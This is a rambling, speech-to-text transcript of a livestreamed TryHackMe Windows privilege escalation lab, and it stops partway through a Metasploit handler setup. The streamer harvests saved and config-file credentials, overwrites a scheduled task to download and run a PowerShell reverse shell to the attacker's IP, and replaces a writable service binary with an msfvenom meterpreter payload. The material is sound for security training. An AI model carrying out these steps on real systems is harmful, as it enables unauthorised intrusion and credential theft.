All right. So harvesting passwords from unusual spots. All right, let's do that. So let me go ahead and do a little. Let me see here. My cherry tree document here, right? Go ahead and go into Windows Privesk, and we're going to do a harvesting passwords from unusual spots. One more time. Oh my God! Again? I have to charge my phone though. I got an idea. Wee. Put you over there. Bam. Now I can kind of see you. I can charge you at the same time. I think I can do something like that. I don't know. There we go. We'll try that. Is that charging? No. You're not charging. Why would you charge? Oh. I heard a boop boop. That's a good noise. Okay. So let's go ahead and copy that. We'll throw that guy over into here. Create a new one of these guys. And we'll go ahead and we will... I usually like to print screen the whole thing. Obviously don't need to print screen that, but unattended Windows installations. Usually power up will show us that like right there. So we're probably going to throw power up on this guy, see what we get with that also. PowerShell history. I've noticed PowerShell history also, one thing I noticed is sometimes you can get onto a box and just start pressing up and you can actually see the history of what they put in. Pretty funny. Okay. IIS configuration. Ooh. It's a good one. I don't know. There was a wireless charger, so it's normal to have interference. It generates a lot of... Yeah, it is a wireless charger. My charging port is broken on my phone. Guess I should probably get it fixed, but you know. It's too much work. Alright, there we go. Okay. So. Here to me now. Let's go ahead and get in this box first. And let's throw power up on it and see if we get anything that really points out to us from the very beginning. GHM, unpriv, and password 321. So let's go ahead and do an R desktop. Attack you. It's not Catherine Dickinson. That was a fun box though. That was a good time. Attack P was password 321. And don't know if we need any of that information. We're just going to try like this. And we'll go ahead and we'll throw in the IP address. Boom. Boom, boom. Let's see what we got here. Yes, I do trust this certificate. Okay. I always get weird things from that, but whenever I do a Remina, we always seem to just hop right in, don't we? Yes. Username was THM on priv. And the password is password 321. And we are hopping in. Let's go. Know what else we should check actually? Let's do a quick mmap scan of this guy. Let's do an mmap. Attack P5985 on this IP address like real quick, because then we'll see see if WinRM's up. It is open. Let's go ahead and do an evil WinRM. Let's try to do that, because then it'll move faster. Everything will be a little bit faster. See if he has rights to do it. He probably doesn't have rights to do it though. I keep saying, if you're going to make a Windows box, give the guy rights to be able to log in through WinRM. Keep saying it. Alright, let's go ahead and make a directory. Let's actually just CD in the Windows Privesk, because I already have everything in here. So we have power up like right here, as you can see. So all we're going to do here is we're just going to do a quick, we're going to bring that over to the machine, I'm thinking, with invoke expression, invoke web request, do a Windows PowerShell. We'll see if AMSI is also on too. So let's go ahead and do a IX, IWR, HTTP 10.13.26.184. I don't remember exactly how it's typed out here. Okay. Go ahead and throw that in there. See if we have to throw an AMSI bypass right there to it also. Oh God, what the heck did I just type in? Should probably do dots there, huh? I was looking at it too, like that looks strange. That looks strange. What did I just type in? 10, 13, 26, 184. Lie like a rug. Oh, probably because I'm in the wrong thing. Thank you very much for the foul Kibonek. Kibertron. Got it. Okay, thank you much for the follow. Let's go ahead and CD into / Windows Privesc. Start that Python server back up again. Throw this guy back at it. See if we have to do an AMSI bypass or whatever else. And we do not. So in case you're wondering how that happened, we messed with the power up PS1 file last time. Last time I used it, and we put invoke all checks at the end of it. So if I go ahead and I do a cat power up that PS1, we see we put invoke all checks at the end of there. So as soon as we put it into the machine, it automatically starts running. We had a machine where we were in a like PowerShell hell, where I was teaching PowerShell hell, and we showed that like right there. So it looks like we have a couple things in here. We have some service permissions. As service user 3, we can start it as that. Don't know if we can restart it though, this service like right here. Usually you get like a can restart, true or false. It looks like we can check for unquoted service path. We have an unquoted service path on disk sorter enterprise. Service privilege. We may have a hijackable DLL, but that's in my own thing. That's not going to do anything for us. So we do have a couple service permissions. So let's just try to just mess with this guy real quick. Let's just go ahead and just do an invoke service abuse like real quick. I don't know if we can actually restart the service, if we can do what we can do with it, but we're going to try. Or we'll see if it even works. Okay, so we did get that invoke service abuse to come back for us, right? Let's see if we put anything in there, net user. See if John's in there now. John is not in there yet. Let's go ahead and go back to command. And the service name was THM service. Let's go ahead and copy that. And we'll do a quick SC stop. Okay, SC start. We should see a John in there now. We're not seeing a John, but we should. So let's go ahead and try that one more time. Now remember, since we put it into the memory, we do have to go back and do it again. We have to put it back into memory each time. Or if you open up another PowerShell, you can try like that. But John is not in there. Oh God, I put in the wrong one again. Oh God. Oh God. There we go. Can you explain why unquoted service path is vulnerability? Okay, so unquoted service path, right? Now, that's literally what that is, first off, is there's not quotes around it. Okay? And what happens as it tries to go through, okay, so let's say disk sorter enterprise, right? That's an unquoted service path, okay? It's going to go and it's going to look at, see, my programs, okay? Then it's going to look at disk, and it's going to try to find anything that's called disk.exe if this is not quoted. So if there's no quotes here, it's going to look for disk.exe. Then it's going to go to sorter. It's going to look for sorter.exe. Then it's going to go to enterprise, then finally disk or bin, then it's finally going to get here. Okay? It'll finally get this disk srs.exe. But if we throw something into here and call it, say, disk.exe, it should be able to run right here as it goes through. Yep. So we would make like an executable for disk.exe. And I always mess up the executable name also. So everyone knows. I do it all the time. But let's go ahead and try, see if we can write service binary to that. Okay. we'd have to restart the service now. Let's go ahead and try to restart him also. So we'll do another quick, we'll go back to, let's go back to command prompt out here. We'll try that. But it's literally, all that happens is just because there is not quotation marks around the file, around the file path. So unquoted service is literally what it is, not quoted. So we'll try that like right there. Let's go and do an SC stop. Okay, that has been stopped, so we can stop it. SC start. Okay, we started it. So now we can try net user again. And John was not made on here. Usually I see it. Usually it works. Usually whatever power up gives you usually works just fine. But we're not seeing them on here. It may also have to do with a restart. There could be a lot of different things that are happening like right now. Let's go ahead and head back over into here and see what does it want us to do, right? So PowerShell history. So that looks like something. Let's go ahead and look at that like real quick. Can I find path? Okay. Because it does not exist. So there's no console history.txt in here. Alright. I'm actually going to throw that into my guy over here. Just so if I have to do it again, I won't have to do the whole thing. There we go. Is user Mike.cat a hint for using Mimikatz? Is there a user called Mike.cat? I didn't even notice that. Yeah. First, we gotta at least become an administrator, though. Or else Mimikatz isn't really gonna show us much. We can see if there's any type of saved credentials on here. Let's go ahead and try that. Ooh, we do have saved credentials. User Mike.cats. Now we were talking about Mike.cats, there he is. Okay, so we do have saved credentials on here. So we may be able to continue on with that, huh? Run as save cred user Mike.cats command.exe. So let's go ahead and do a run as. It was /user Mike.cats. This is the first time I've ever actually done this command. This is the very first time I've ever seen it actually work. And that's run, correct? Or if it does work. I don't know if it works yet, but this is the very first time I've ever seen it. PowerShell.exe. That's the password. Oh, I had to do save creds, didn't I? So let's try that one more time. Probably just messed the whole thing up. You had a bad expansion of user profile as you are already in the user folder. You may remove user profile and type the full path manually. Did I? Let's try it real quick. App data, roaming, Microsoft, Windows. See if it's there. Windows, PowerShell, PS, Redline. Oh, cat console history.txt. Ah, okay. This is my console history so far. Julia Jones. We got Julia Jones' password. Okay, cool. All right, thank you very much. I didn't even notice that. Let me just go up to like right here because. So we got Julia Jones' password now. Okay. Run as save cred. Run as save cred user. It was Mike.cats, right? And we're going to try to run PowerShell.exe. Who am I? Mike Cat. Awesome. Who am I /priv. I learned that the hard way. Yeah, usually whenever I get an error message, I'm like, oh, okay. Especially in Windows, because the error messages are so horrible. It's like, oh. So let's see what the error message actually says. Cannot find path. See users, THM privilege. Okay, yeah, because I was already in there. Yeah, okay. So if we got out of that path, like let's say we got to C drive. Right. Then we ran that again. Okay. So whatever the user profile is, that's what I want to look at. Okay. So pretty much just want to actually look at the app data, roaming, all that good stuff, huh? Okay, cool. That was pretty awesome. We did that run as also command. So let me go ahead and show that that worked. Why does the control shift print screen working anymore? Okay, for some reason, control shift print screen, my awesome print screen thing that I like to do is not working for some reason. So let's go ahead and we'll hop back over into here and we'll just do a regular print screen, I guess, now. Like peasants. Like the peasants that we are. Oh God. What's wrong? Control shift print screen. Okay, you know what I'm going to do? Because the Windows... Remina seems to be messing around like right now for some reason. Usually Remina doesn't act like that. We are working on Windows privilege escalation like right now. I'm going to quickly though... I think I'm just going to have to exit out this guy and come back into him. In all honesty. We are going to quickly... We're going to exit out of Try Hack Me though. Or not Try Hack Me, but Callie here. We're going to hop back into him and we're just going to resume where we left off. Because my, what is it? Control shift print screen isn't working like right now. It's being weird. So, right now we're not working on anything. Alright. Callie's starting back up again. Seems to like to have me put my stuff in twice. That's just the life that I have to live. Expand the value and let it use. Okay, word is path. Yeah, for now I'm just gonna actually just go and just look at, you know, each user's, I guess, whenever I do it. I just won't do the user profile like that. I'm just gonna go and actually look at the path and see what's going on with it. Let's take a minute to start up, but we'll hop into here and we'll go from there. There we go. Let's get back into Try Hack Me. Let's make sure Control Shift print screens no longer work for some reason. Why are you no longer working? How do you do hotkeys in this again? Within here? Hotkeys. Anybody remember how to do hotkeys? Flame shot. Shift super plus. What? Why was it shift? What is shift super? Okay, that's super weird. It just changed for some reason. That is strange. We got some strange stuff going on nowadays. All right, let's get back into Try Hack Me. That is strange. I'm gonna have to black out the screen for a second because obviously, you know, you guys can't see everything that's gonna happen in this next 3 seconds of me trying to log in. I should join now. I'm not a robot. Did not have to do a CAPTCHA. There. Now it seems like you guys are really watching it with me, you know. All right. We are back in. Travis Secure, how you doing? So we are back in. Let's go ahead and hop back in that Windows Privesk. Let's go ahead and get this cherry tree document open back up. Let's go ahead and get my... Let's get open back up. Bash script CHM. Callie. There we go. Okay. Boom. And let's go ahead and get a window reopened. And we'll CD and do desktop. Try Hack Me. Windows Privesk. All right. Let's go ahead and get Python 3 web server back opened up again. And let's hop back into this machine. with Remina. Add me on Try Hack Me for fun. Yeah. I don't care. My name's Overgrown Carrot 1. Let me see here. I don't know how the hell to add people. I'm not good at this stuff. I'm gonna go with this in the dashboard. All right, we go for invite. Okay, what's your name on it? Send invite. Oh, that's an email address. Let's go and search for Try Hack Me username. This is just Trav Secure. Can we search that? Crypto Trav. Okay. Crypto Trav. Search. Add. Now, how you actually accept it, I don't know. I don't know how to do any of this stuff. I have no idea. All right. Go back to learn, or actually back it up like a little bit. Let's get back to like where I was before. Boom. Oh yeah, anybody, if you send me one, as long as I see it and I can accept it, I will 100% accept it or whatever else, as long as I can see it. All right, cool. Let's hop back into him. We got THM, unpriv, and password 321. We got that Python server up and running already, right? So we're good with that. Okay, we're right back where we started at. Cool. So let's go ahead and do Control-Shift print screen. There we go. I did a Windows button print screen for some reason. I should do Windows Shift print screen, huh? Because that's what I've been hitting. Oh, we're going to do another hotkeys. Settings. Settings. Maybe that was power. Maybe that's what the power button thing was. Windows, customize shortcuts. Boom. Boom. Set shortcut. Yeah, that's what the super button was. Alright, so it still works. I don't know what the heck's going on here. Alright, cool. I don't know what the heck just happened like right there. That was really weird. So let's go ahead and hop back over into... Where are you going? I feel like my mouse got stuck in Windows for some reason. Alright, Real Lurk. Okay, Real Lurk. Now you're on and you sent it to me. Now I want to see how to find it. Yes, I am not smart enough to find it. So we got the saved credentials right here, right? So that's coming after this guy right here. Now I want to see... I should probably show that I actually did that command key list first, huh? Let's go ahead and do command key / list. Whoops. Or lost. Hey, either one. It knows what to do. Good job, Windows. You know. Go and copy that, and we'll throw that into here. We can see that Mike.Cats has it. Okay, so you sent me a friend request, right? So, do I go to dashboard, right? I feel like I should see it, right? See, I don't see anything. I suck at this thing so much. But then I got told, oh, it's going to be in your email. But I've checked my email. Oh, I actually just did get an email. Maybe I'm just an asshole. Okay, I found yours came through. I was about to say, other ones that I've had have not come through before. So it's super confusing. Okay. Yeah, I just got an email. Oh my God, would you look at that. Refresh. I now have to scroll down. All right. As you guys see, Frank is on a 111-day thing also. So he's going for, what were you going for, Frankie? I think he was going for, he said, 420. Yeah, he's going for 420. All right, back to Windows Privesk. Whew, okay. Yeah, it's not the best user. It's really not, the Real Alert, because we were in one stream. We sent friend requests. It was for the 7H30, if you saw him, which I like his streams. He has some fun ones on there. It was for him, and yeah, like nobody could see each other's things. You know what I'm saying? If we had something as unattended XML, usually PowerUp sees that. But so far we found everything else. So let's just go ahead and actually look at that unattended.xml file. So we have C unattended.xml. Let's go ahead and dir, see if we got anything in there. Usually it finds that unattended XML file. We have the Panther one, which is usually what it finds, is that one like right there. So let's go ahead and CD into, what was it? C drive Windows Panther. Unattended. Okay, nothing in there. Power up has not failed me with that one yet. But we also have the sysprep INF and then sysprep XML. Let's go ahead and check out those two. Not sure if I want to see someone else thing. What did I do? I don't know what I said. I probably said something weird though. Sysprep INF. Okay, so we can CD into sysprep. Sysprep. Let's go ahead and go back one directory. Okay, we got sysprep XML, which is not here. What about Panther? Nope. Okay, so IMF is not in there. So none of those are actually in there. Okay, cool. So usually PowerUp finds that. All right, IIS configuration. Let's go ahead and check that one out. CD into the C drive. IIS. Should be in there. Oh, CD to Internet Pub or whatever it is. INET Pub. CD into www root, I guess. Is that where we're going, or are we going into the logs? Okay, yep, root and then web config. Doesn't look like we have anything in here. Do we have something in this ASP client, I'm wondering? Here's a quick way to find database connection strings on the file. Huh. Let's look at that. Oh, wow. Would you look at that? Public key token. Okay, don't care. Database. THM secure. User ID is database admin. Password is that. Oh, would you look at that, huh? Let's go. I like that. All right, cool. So IIS, we got some stuff in there. And I'm actually going to save that guy like right there. We'll throw him over in here. There we go. Boom, boom. And then retrieve credentials from software for putty. I have done this before, but I've done it with, oh crap. I probably should have been actually answering questions. Okay, at least we found that one. We know that one. Julia Jones shouldn't be too hard to find either. We found hers in the beginning. There's his password. There's the same password on your wizard's credential using command key as run as spawn a shell from Mike Cat and retrieve the flag from his desktop. Oh, yep, never mind. Let's go ahead and check out this putty one. And how do we look at that? Because I've never done that one before. So I've done this before. I say I've never done that before, but I've done this before with but this is Simon Tatum. How do we know that that's because that's one of the users, right? I'll take it. Or was that the maker of putty? It's probably the maker of putty. Never mind. That's a file folder. That's a path folder, isn't it? All right, so we did. We got cool pass. All right, cool. So we do find a password for that. Let me go ahead and copy that guy also into here. And we'll do that like right there. Okay. So let's go ahead and look up Julia Jones. User has been left out of PowerShell history was the password. So we did have that PowerShell history that we found. We did find Julia Jones on there. I still remember exactly how we did it. It wasn't even in this PowerShell. Maybe it was. It was before we closed it out, wasn't it? Okay, let's go ahead and do that one again for Julia Jones. We'll go back to my notes, make sure I took notes correctly here. And we had something in this user profile one, right? which we did that. Then we got rid of user profile. All right, we did that like right there, right? But yeah, we can't do it like that. We got CD into C, CD into users. Who am I? Wait, I'm THM, CD into THM. And then we're going to go ahead and throw that in there. Get rid of the user profile guy like right here, right? What do I have going on here? I messed this up bad, didn't I? There we go. Okay. So we did see some stuff in here for her, right? And that was her password like right there. Do we have to actually go into there? Is that what they're asking us to do? Nope, just what is her password? For Julia's own super secret pass. The web server is running on the remote host. Find an interesting password on web config files associated with IIS. What's the password? DB admin user. We saw that, and then I said, oh no, it's this one because I was looking at the wrong task. So, oh no, we don't need that. Haha. But we do need that. Okay. There's a save password with credential you command key and run as. Okay, so we did that also. We did our save password one, right? Go and check out my notes here. Actually, it's right over here, isn't it? So if I do who am I, right? I am not the correct person. just as I suspected. There we go. Who am I? Let's CD into slash. CD into users and Mike. CD into desktop. Type out flag.txt. I believe we can also do cat flag.txt with PowerShell nowadays. They continue to add more and more Linux commands into it, which is awesome. What happened? I know what happened. All right, retrieve the saved password stored in the putty session under the profile. Was password for Tom Smith user. Well, we technically retrieved it, but I mean, you know. I don't know if we can really say it's Tom Smith. But it looks like cool pass, whatever. But we're going to go ahead and we're just going to run that again. That's weird. Very, very strange. Because you can see it, but he can't. Very, very strange. Okay. Alright. Cool. So we did that one like right there. Now we're going to other quick wins. This guy right here, okay. So we have scheduled tasks that we can always look at. Looks a little bit familiar, doesn't it? Whoops. There we go. So we can look at scheduled tasks. They obviously have something in here for that. Or it looks like there's going to be something with that. And they have always install elevated, which we can throw an MSI file. It should be at that guy like right there, right? And now install elevated. There's another thing we can do. So let me throw that into my notes. And we'll go ahead and we'll... There we go. Okay. So we'll throw that in my notes and we'll start from the top. And very first thing we want to do is look at scheduled tasks. So scheduled tasks we go ahead and look at with a quick SCH tasks, right? Wow. Okay. Got a lot of stuff in here. Power-ups should have been able to find a scheduled task, I believe. Yeah, let's go ahead and do that. Scheduled tasks will be a list from command line, command without any options to retrieve detailed information about any services you can use the command as the following with the task name. So all these are disabled. A lot of these are disabled. Kind of want to only see, can I filter this? Kind of like a filter for running. Can I do something like that? Nope. Okay, didn't like that at all. I feel like Power View can also do this too. So this is a lot of scheduled tasks in here. So that would be something that we definitely have to comb through. Don't know if we actually have to do scheduled tasks in this guy. I feel like WinPeas, this is something that WinPeas would also show us too. Jesus, Windows. Wonder why you have so many damn problems. Alright, let's go ahead and see what we're supposed to do with this guy, right? So you'll get lots of information about the task, but what matters for us is the task to run parameter, which indicates what gets executed by the scheduled task, right? Which we actually don't even see that over here, do we? Next runtime, next runtime. I guess next runtime would also be something we want to look at too. But let's go ahead and put in that other command. It says we're going to get a lot of information. No, because we actually need to put in the task name for that one. Integrity scan. Device. I'm looking for something that's not in Microsoft Windows. I'm trying to find something that, you know, is a little bit different than everything else, I guess. Maybe something that's running from like a user's directory or something that's running from maybe like a temp directory like ctemp. What is this? Microsoft Windows Shell. No, it's just ready. Yeah, everything looks like it's running from Microsoft Windows Defender. It looks like it's running from those photos like right there. Okay, so I'm not seeing any scheduled tasks in there are really sticking out to me. Let's go ahead and see what we're supposed to do down here. What is the task user one flag? Great. Now let's go ahead and do a whoami/priv, I guess. That, well, we gotta see if always install elevate is on, actually, don't we? So let's go ahead and check this out. All right, for the HKCU first. This was only to find a specified registry key or value. Command prompt. Huh. Really? Well, this one right here. I don't have to start up another machine, do I? No, okay. I'll make sure of that first. And find a specified registry key or value. HKLM. That all looks correct. That shouldn't matter, like right there. I just wanted to make sure that everything looks correct in here. That is very, very strange. Oh, okay, so it says that won't work on this thing. So supposedly there's a task called Valm task that runs in C. Let's see here. C tasks. Let's see here. Next time we schedule task runs, you should receive the reverse shell for task user one privileges. So I guess we gotta look at that scheduled task guy again, huh? But all we're seeing over here is everything's Windows, Microsoft Windows. Scroll all the way up to the top. Must have missed something. Alright, oh yeah, folder / ball task. Boom, look at that. Wow. Very first one. Okay, so let's go ahead and throw him in here. So we do have something, a task name called vol task. So we can do an iCackles now, right? For that task, like right there. Or the scheduled task right here for that task. For vol task. There we go, and we'll do vol task. Okay. So vol task, right? That's task name. Okay. It's running, and it's the task to run is C task schedule task.bat. It looks like. Let me go and actually print screen this guy like right here. So let's run schedule task.bat in there, right? Okay, so let's go ahead and figure out if we have full permissions on this guy now. We'll use iCackles for that. ICACLs, whatever you want to call it. All right, for this guy like right here. Built-in users do have full permissions on it. So we do have full permissions. Easy freaking day. Okay, so let's go ahead and throw that over into here. We're not going to use netcat64.exe. No. We can modify that bat file, insert any payload we like. For your convenience, SCC tools, let's change the bat file spawn a reverse shell. No. We're not going to do that. I want to run, well, so we're going to echo that into there. That's scheduled task.bat. That's weird. You know what I want to echo into there? We're going to try something. We are going to try something. Do I have PowerCat in here? No. Invoke TCP. Let's go ahead and search for or locate invoke port scan. Trying to find something in here. Invoke reverse. Oh, invoke, locate, invoke, PowerShell TCP. We're going to grab him like right here. Copy him over to here. We're going to go ahead and nano that invoke PowerShell TCP.ps1 file. Page down, all the way down the bottom. We are going to do a invoke PowerShell TCP, or invoke PowerShell. And then from here we're going to do a TAC reverse, TAC IP 10.13.26.184, TAC port is going to be 4444. All right, that's what we're going to run on it. And for this guy over here, I want to echo. Let's go ahead and go to C task. I want to echo IEX IWR. Use basic parsing just in case. HTTP 10.13.26.184 / invoke PowerShell TCP.ps1. Actually, I think I want to actually echo PowerShell.exe. So hopefully it runs. Well, he's actually running NC64 to doing that, huh? So, and then he's trying to send command.exe back to the attacker. So can we do like command/C to execute that command? Let's see if that works. Well, I want to echo that into, and am I going to overwrite it? Looks like I'm just overwriting this guy. Okay. Let's go ahead and do a type schedule task out back. I overwrote him. Suppose we're going to run that. So let's go ahead and make a listener over here. RL wrap. Do I have RL wrap on here? That's scary. Okay. What port did I do again? 4444? Something like that? That's not correct? Yep, okay. RL wrap. What is it? Tech outright to listen for support? No. That's a log file. How the heck do I listen with RL wrap? All right, Travis Security, you have a good one. RL wrap, rep for listen. That worked great. All right, we're just gonna do a netcat. So then we can see if this guy's gonna run or not. I kind of just run him. See if he actually runs. Okay, so I don't get a callback over here, so that one did not run the way that I expected it to. Unable to connect to remote server. Okay. Did I... Yeah, well, you can't connect to that, obviously. Python 3, TAC-M, HTTP server. Port 80. Hey, you. All right. You have a go on Real Lurk. Have fun. Do your thing. Thanks for stopping by. Let's go ahead and try to run that scheduled task.bat again. Let's see if I get a callback over here. He got him. He downloaded him. So it definitely is not recognized as a command or command left function. Okay, so, but he did get him. Let's go ahead and do a cat for invoke PowerShell TCP.ps1 again. Invoke PowerShell. Oh, invoke PowerShell TCP. That's probably why. Let's go ahead and we have to open up that file. Or we can just get another one, huh? Since he's just going to run another one, isn't he? So let's go ahead and do a nano, because that's not it. It's invoke PowerShell TCP. Page down. We're going to do an invoke PowerShell TCP. Let's go ahead and try to run that one more time. So that came back. So we did an invoke PowerShell TCP function in there. That one came back. So now what we should have to do is just wait. And that scheduled task should run, I guess. So I actually kind of want to show that I did it like that. So we just echoed it in there. There we go. Okay, and we'll throw him over here. And now we just wait. Start the listener. Okay, next time the scheduled task runs, you should receive the reverse shell. While you probably won't be able to start the task in a real scenario and would have to wait for the scheduled task to trigger, we provide the user with permission to start the task manually. Okay, cool. So let's go ahead and grab that. And we'll start the task manually and we'll see what happens. Because it probably runs like once a day or some crap like that. Or just like at startup or something like that. Let's go ahead and do a Control V. Did I not copy him? Thought I copied him. Attempt to run scheduled task, vol task. We got a callback. Who am I? And we are now task user 1. Let's go! There we go. So, if you want to follow stream, they do put in NC64 there. If you want to upload yourself, you can look at GitHub nc64.exe, and you can actually find it in here also. So you can actually download it, put it onto the machine yourself, and then run it like that also. So there's nc64.exe like right there. You can download it, upload it onto the machine, and have it run like that. That's just another way to be able to do it. I think living off the land shows you that. I believe we also do it. Maybe it was in like Wreath or something. I don't know. We've done it. I've done it a couple times now. I had to actually upload like that. We could also get an interpreter shell callback, something like that, if we did an MSF Venom attack. But that was for always install elevated. But we could make a bat file with MSF Venom. I don't know if we get to delete that guy or not, but we might be able to do something like that. We could also maybe even drop down the bat file, just copy that whole thing into there and see what happens. But let's go ahead and CD into users. CD into task user 1, right? Yep. CD desktop. And we have this flag.txt. We'll type out that flag.txt. THM task completed. Thank you. Feel good about that one. Go ahead and submit that. All right. The next one we have is abusing service misconfigurations. How long have we been streaming for so far? Has it been over an hour yet? Just under an hour. So I'm going to go ahead and take a quick break. I don't want to overexert myself. You know? Really into the hour-long break things. Well, every hour take a break. I'm really into that. About every 50 minutes, take a break. So yeah, I'm going to go ahead and take a quick break, and I will be right back. So I will have my phone with me, so if you guys got any questions, more than happy to answer them while I'm on the break. All right, we are back in action again. So let's go ahead and check out abusing service misconfigurations. Whoa! Okay, there we go. Abusing service misconfigurations. So Windows services are managed by the Service Control Manager. SCM is a process in charge of managing the state of the services as needed, checking the current status of any given service, and generally providing a way to configure services. Okay. Each services on Windows machine will have an associated executable, which will run by the SCM whenever a service is started. It is important to note that service executables implement special functions to be able to communicate with the SCM, and therefore not any executable can be started as a service successfully. We also may not be able to stop and start services. That's another thing too. So, all service configurations are stored under the registry under there. Oh, okay. So I'm print screen this. And I'll hop back over to my notes and we will do a service misconfigurations. Okay, we'll save that. Let's keep going down. Okay. There we go. Okay. And let's keep going. The DACL has been configured. It will be stored as a subkey called security. As you have guessed by now, only administrators can modify the configurations. Very, very true. Okay. So, insecure permissions on service executables. This is like where we're able to start and stop services, things like that. So let's go ahead and take a look at this. There we go. Throw that into here. All right, cool. We see that the service installed by the vulnerable software runs as service user 1, and the executable associated with services, blah, blah, okay, when then proceed to check the permission of the executable. We then proceed. All right. So we can copy that, and we'll paste that into my notes over here. And here are some interesting things. And here we have something interesting. The everyone group has modified permissions M on the service's executable. This means we can simply overwrite it with a payload of our preference, and that service will execute it with the privileges of the configured user account. Let's generate an exe service payload. Use FSF Venom through a Python web server. Okay. So most likely not going to do the exact one that they do. You know, I don't like writing to disk. So I'll most likely have to go into do that exact one. But right now, I'll just grab some notes, store them in here. We'll go from here. Command prompt, boom, boom. Then we have some unquoted service paths down here also. And we'll probably do something with those unquoted service paths because we did already see those within Power Up. But there is also a way to see those within command prompt itself. When we can't directly write into service executables as before, there might still be a chance to force a service into running arbitrary executables by using a rather obscure feature, which is unquoted service path. See how this is quoted like right here? That means that'll go all the way across. But if it's unquoted, see how that's quoted? That means it's going to run vnc-server.exe. But if it's unquoted, then it will not. See how this guy's unquoted, as we saw before? Then it will, it'll try to run wherever there's a space. So, command C programs this-sorter.exe. Okay. And we can run something like that. Just like I said before, sort. Okay, so sorter we can run, or we can run this-sorter.exe, and there we go. So we'll probably just do a sorter. When the SCM tries to execute the associated binary, a power arises. Since there are spaces on the name disorder enterprise folder, the command becomes ambiguous and the SCM doesn't know which of the following you are trying to execute. This has to do with how command prompt parses a command. Usually when you set a command, spaces are used as argument separators unless they are part of a quoted string. So, we are now going to make something most likely and throw it into there. And we're going to throw it into, we're going to call it dis.exe. So like I was saying before, as soon as it gets to disk, it's going to try to run dis.exe. We could probably also throw it into sorter if we wanted to and call it, or it might be dis-sorter.exe, it might just be sorter.exe. I always mess that part up. Alright, so I got this down pretty good, unquoted service pass. I'm going to continue on. I'm not going to take any notes like right there, but we will look up insecure service permissions. I will take notes here. And we want to look up insecure service permissions. Okay, and here it says, you might still have a slight chance of taking advantage of a service. The service is executable, DACL is well configured, and the service's binary path is rightly quoted. Should the service DACL, not the service's executable DACL, allow you to modify the configuration of a service, you will be able to reconfigure the service. This will allow you to point any executable you need to run it with any account you prefer, including system itself. To check for service DACL for the command line, you can use access check for the sysinternal suite. For your convenience, a copy is available at there. You can also download access check and things like that too from the sysinternal suite, just so you know. He said it was in tools, right? So this is something you can also download and put it on the machine or do like a wget with it or something like that. So we do an access check 64.exe. Agree to it. And we should have seen some stuff in there. Should have. Oh, it wants us to actually do it like that. What we can do is so it wants us to actually look at the file itself, huh? So if we find a file that we think is something's wrong with it, we may be able to run something like this. I don't know if THM service is actually going to work. We'll see. Okay, yep, THM service is an actual thing on here. Maybe it's not. Owner, entity authority system. Okay. Access allowed. So we're looking at users. Access allowed, H type, built-in users, service all access. Okay, so we have all access. We are a user on here. So, and then if we run it, it'll run as entity authority system. Okay. So let's go ahead and, let me see, I got where my notes last left off at, right there. Go ahead and grab this down here. This is a long one, like right here. And we'll throw that down into here. All right. So, get the flag on service users 1 desktop, service users 2 desktop, and get the administrator flag. Don't forget to input the flag at the end of this task. Okay. All right. So we are going to do service 1, service 2, and administrator, right? Now, we know that unquoted service paths exist. We know that that's a thing on here, right? We know that this guy right here exists. So let's make a reverse shell. That starts up as service user 2. Let's go ahead and see. Okay, so service user 1, we're going to start off with the insecure permissions on service executable. So I guess Windows Scheduler has an insecure. Turns out it's worth some vulnerabilities, but we're going to start with a query. Configuration, use SC. Okay, so let's do SC at first. And let's see what we got here. SC query. All right, so we got SC query here, right? And usually I try to find something that's a little weird. You know, like off to me or something like that. All right. This guy's stoppable, like right here. He's not stoppable. This guy up here is stoppable. And he wants us to actually tack Windows Scheduler, right? So I think we'd have to actually go through and actually look at each one of these processes that are running, these services that are running like right now, and actually see, can we mess with them? Instead of doing that whole thing, we're just going to go ahead and look at him. Service start name is service user 1. All right. So let's go ahead and just show that we did an SCQC, even though there's a bunch of stuff in here. Or if we can do a different one. Let's go all the way up to the top. That's stoppable. That's running. Oh, that's that. Never mind. I'm not going to attack that one. What about base filtering engine? Can we do that? See if it's running as, see what it's running as. IT authority, local service, don't really want that. Wish we could see what it's running as over here, that'd be sweet. That's stoppable. Let's try this one like right here. There's got to be an easier way to do this. Local system. Alright. Let's go ahead and we'll just do it for the Windows Scheduler one. And we see that service user 1 is running it, right? So let's go ahead and try to do something with this guy right here. Okay. Oh, service user 1 is running it. So we're going to go ahead, enter, and we got this guy right here. It's running. Service name to look more at that service. All right, so we see service user run is running this guy. So let's go ahead and start to mess with this guy right here. Whoopsie daisy, there we go. All right. We see that service installed by the vulnerable software runs as service user 1. The executable associated with the services is in C program 2 system. Yep, there's one. MC to check the file permissions on that executable. Good point. We also have to make sure the file permissions are correct too, don't we? And users, it's just an I. I don't know if I can do anything with I. And here is something interesting, the everyone group. Oh, everyone does? Where's the everyone group? Oh, everyone, I, and then M. Okay, so we can modify it. Everyone group does have modifiable permissions there. Okay. All right, so the everyone group has modifiable permissions. That is correct. On the service executable, this means we can simply overwrite it with any payload of our preference, and then the service will execute it with the privileges of the configured user account. All right. So we're just going to overwrite this guy. We're just going to overwrite wservice.exe, I guess. I must say, I feel like he has to rename it, right? Okay. Yep. So he did. Okay. So let's go ahead and make a wservice.exe. So we'll do an MSF Venom. Probably exit out here. MSF Venom. Tag P Windows. Interpreter. Reverse TCP. We'll do it for 10.13.26.184. Yeah, sure. L4 888. Sure. And what do we call this? What was our service that we had? We're going to call this wservice.exe. Windows shouldn't care if it's case sensitive or not, but we're going to do it. wservice.exe. We'll call it that. And let's go ahead and we will throw that into my notes now. And let's go ahead and hop over to PowerShell. And from here, we are going to do a wget http 10.13.26.184/wservice.exe. Right. And then we are going to, tac out file. It's going to be wservice.exe. S-E-R-V-I-C-E.exe. Okay. Let's go ahead and copy, or actually, let's go ahead and do a, copy their wservice, this guy right here, to, actually we can rename it, can't we? Run to wservice.exe.back. Okay, we renamed that now, so that's good to go. Go ahead and print screen this over here. Now let's go ahead and copy wservice.exe into right here. Let's go ahead and do a dir for right there. Make sure that actually exists. And we have wservice.exe in there now, and it's obviously a different size than what this guy is. 2073.207 something, and yeah, 360, so we're good. There's our file size, so we are good on that. So now, let's go ahead and We got our list and everything right. Let me just stop and start the service right, obviously. Okay, now we need to stop service and then start that service back up. So we're going to do a command prompt sc stop, and it was win scheduler, right? That was service that we were attacking right there. Yep, Windows scheduler. Okay. Windows scheduler. Then we'll do an sc start for that service, and we should get a callback. Let's go ahead and get MSF console up and running. And that was on port 8888. And we should get a callback for that guy, like right there. Should. Guess we'll find out. So let's go ahead and do a use exploit multi-handler. Set the payload to Windows x64. Interpreter. Reverse 